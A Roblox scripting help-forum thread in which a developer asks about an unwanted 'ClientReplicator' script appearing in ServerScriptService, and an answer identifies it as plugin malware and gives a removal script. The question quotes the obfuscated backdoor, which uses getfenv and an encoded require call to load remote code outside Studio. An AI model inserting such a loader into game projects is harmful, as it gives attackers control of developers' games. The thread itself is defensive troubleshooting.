Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
1

roblox clientreplicator script spamming all of my games? [Solved by "Sebgamingkid"]

Asked by 3 years ago
Edited 3 years ago

so there is a virus i think in all of my games so this client replicator thing keeps spamming my "ServerScriptService" everytime i open roblox studio teh first thing i see is a script in "SrevreScriptService" called "ClientReplicator" at first i thought it was roblox updates but then i got suspicous of it so i googled it and i saw some questions like this one it didnt fix it though and that is why i am asking for help the script that contains the "ClientReplicator" is

ocal uKaQU=game:GetService("RunService"):IsStudio();local RkFQ7=true;local Tzms7=false;local MvC5A=getfenv;if uKaQU ~= RkFQ7 then MvC5A()[string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))](0x39DB7846*(2+2+2-1+2+2-4));end

Thanks!

1 answer

Log in to vote
0
Answered by 3 years ago

It's a virus. Most likely from one of your plugins. You can setup a script to remove it:

Put in ServerScriptService this Script to help remove it:


local SSS = game:GetService("ServerScriptService") local function ChildAdded(d) if d.Name == "ClientReplicator" then d:Destroy() end end for _,c in pairs(SSS:GetChildren()) do coroutine.wrap(ChildAdded)(c) end SSS.ChildAdded:Connect(ChildAdded)

I, however, would highly suggest sifting through your plugins and figuring out which one is causing the issue or if you have other viruses inserted into your game. Just delete the ClientReplicator script before you upload your game.

0
yeah so it worked about removing some of my plugins i think it was the building f3x thing that spammed it since it showed on roblox studio that it wanted access to my scripts so i pressed deny and it worked! Thanks for your Help! Rgboffical_yt 40 — 3y
Ad

Answer this question